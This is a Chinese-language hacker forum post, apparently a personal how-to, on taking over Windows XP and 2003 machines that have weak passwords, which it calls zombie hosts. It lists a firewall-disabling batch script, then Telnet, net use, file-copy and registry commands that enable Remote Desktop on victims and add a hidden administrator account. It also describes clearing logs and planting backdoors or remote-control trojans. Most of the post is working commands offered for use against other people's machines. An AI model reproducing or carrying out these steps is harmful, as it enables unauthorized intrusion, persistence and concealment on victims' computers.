好久不玩黑了,在網上看好多菜鳥在掃肉雞,抱怨掃不到135 !現在都是自動掃描自動傳馬,到現在所學的東西都是自己Google加自己總結出來的,免殺做起來比較麻煩,學習中,從不DDOS別人,不充Q幣不開會員,要那麼多肉雞也沒什麼用,網賺也不是很感興趣。得到肉雞的方法很多,拿SHELL提權也可以得到很多,辦公室上網,拿出啊D隨便掃了下,三隻服務器,N只XP。方法很簡單:
1、本機關閉防火牆(net stop sharedaccess) 、關閉所有殺毒軟件、關閉360***防火牆
2、開通本機幾項服務,將以下代碼保存爲x.bat執行即可!
@echo off
color c
title 開啓服務
echo.
echo 開始掃描前需要檢測並開啓以下服務,請稍等....
echo.
sc config LmHosts start= auto
sc config RpcLocator start= auto
sc config NtlmSsp start= auto
sc config lanmanserver start= auto
sc config SharedAccess start= disabled
net start LmHosts 2>nul
net start RpcLocator 2>nul
net start NtlmSsp 2>nul
net start lanmanserver 2>nul
net stop SharedAccess >nul 2>nul
echo.
echo 開啓需要的服務成功完畢!
pause
3、設置啊D網絡工具包:IP可以掃本機外網的IP段,(電信,鐵通,聯通都會有所不同,非電信掃電信的IP要用***代理)線程及弱口令密碼
發現弱口令的,點"遠程開啓Telnet"(如有出現錯誤,不明白的可以參見啊D主頁說明),Telnet連接對方的51端口,
XP的,下面雙開3389:
1、關閉防火牆(net stop sharedaccess)
2、開啓3389(XP3389.exe)
3、termsrvhack.dll
4、3389.bat
具體如下:
telnet X.X.192.104 51
net share
如果只開了IPC$共享,那麼執行 net share c$=c:
本機cmd 下執行:net use \\X.X.192.104\ipc$ "" /u:administrator提示成功
copy xp3389.exe \\X.X.192.104\c$
copy termsrvhack.dll \\X.X.192.104\c$
Telnet肉雞cmd下執行:net stop sharedaccess 關閉防火牆 執行xp3389.exe 提示成功
本機cmd下執行 tasklist /s X.X.192.104 /u administrator /p /svc
查看DcomLaunch, TermService的PID值,假設爲:2010
編輯本機3389.bat 把對應的PID值改爲2010
本機執行copy 3389.bat \\X.X.192.104\c$
Telnet下執行3389.bat提示成功,再添加管理員就ok了
net user test$ /add&net localgroup administrators test$ /add
如果本機是外網IP的話,如果net use \\X.X.192.104\ipc$ "" /u:administrator提示不成功
可以telnet下執行 tasklist /svc >1.txt
本機執行net use \\X.X.192.104 \ipc$ "" /u:administrator然後 copy \\X.X.192.104\c$ \1.txt c:\
到本機C:盤下查看,
如果掃到的是2003服務器,可以直接telnet然後執行:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d /f(可以直接開啓XP 2003 的3389)
然後直接用掃到的弱口令登錄,克隆?員帳號,清除日誌,留個SHIT後門或鴿子之類的遠控也可以
如果執行以上代碼連接不了3389可以Telnet下執行:
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber (查看端口,默認的是3389)如果不是3389 d3d,把查到的十六進制數據用科學計算器轉換下就OK了!
三個文件,網上找!
剛開的這臺,下線了
換一臺